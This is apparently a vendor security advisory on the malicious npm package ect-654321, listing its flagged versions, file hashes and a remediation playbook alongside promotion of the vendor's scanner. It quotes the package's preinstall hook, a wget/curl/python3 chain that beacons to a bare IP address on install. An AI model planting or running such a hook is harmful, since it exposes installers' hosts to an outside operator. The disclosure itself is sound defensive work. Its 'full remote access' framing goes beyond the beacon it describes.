Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

ect-654321npm

ect-654321 is a confirmed malicious npm package (MAL-2026-5719) that opens a backdoor for remote access (malicious versions 100.0.0, 100.0.1, 100.0.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in ect-654321 (npm)

MAL-2026-5719
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ect-654321

What this malware does

ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget http://10.107.121.85:8000/callback_wget_654321 || curl http://10.107.121.85:8000/callback_curl_654321 || python3 -c...urlopen('http://10.107.121.85:8000/callback_py_654321') on npm install. The destination is a bare RFC1918 IP on plain HTTP with no documented purpose, and the callback path embeds the package version as a probe identifier. The package ships no library code, no main entry, and an empty author field with description 'Probe', so the only effect of installing it is the outbound beacon. This shape — empty placeholder package + version-numbered callback path + bare-IP HTTP fetch in preinstall — is a dependency-confusion / namespace-probing payload that confirms reachability of the installer's network to the operator and leaks the installer's source IP, DNS resolver, and host identity. The triple-fallback (wget/curl/python3) ensures the beacon fires across diverse install environments. Whether published as red-team research or real attack tooling, the install-time behavior is identical and harmful to any installer that pulls the package.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

7 flagged
100.0.0100.0.1100.0.2100.0.3100.0.4100.0.7100.0.8

Indicators of compromise (SHA-256)

0dd80b0b726617e2c81c5719de07ec2f758418969a127479a4d1ced0a6ca92aa
ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540
12d348b2976b56bca5f0143d3b4826cb307666fd1eef63856ce068546da38b5c
3dfd4e0c673827c4ef14ad67fb37776acc2cba76c72465df7098f7d88b38c2c6
4a85e1658ff74a90256e56d6c50bd579431c8abbba856b8c4cc4252268def993
70deda2f7dfa7c103e4c1054eb890013a5ef3b8826e5fec007fbcc00a91fbba7
ddb34c7c8d1f3d36dbd8e0d0913de11a34ae2b3c2b69650790718a1994597b6e
915a71dc41c4af3d6cd64461d5e64992c2e48d303fd82e3b4aecced81842bba6

Detection & response playbook

Backdoor / remote access
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for ect-654321 (7 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging ect-654321 across your stack and pipelines.

  2. If you installed it — respond

    ect-654321 establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.

  3. Did it already run?

    If ect-654321 was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks ect-654321 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. ect-654321 on npm has been identified as a malicious package (versions 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.7, 100.0.8 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006261IN-MAL-2026-006254IN-MAL-2026-006249IN-MAL-2026-006247IN-MAL-2026-006264IN-MAL-2026-006258IN-MAL-2026-006256GHSA-q226-9qx7-fxmj

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks ect-654321-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the C2 callback and severs the channel.

Explore

ect-654321 (npm) malicious package — MAL-2026-5719 | O3 Security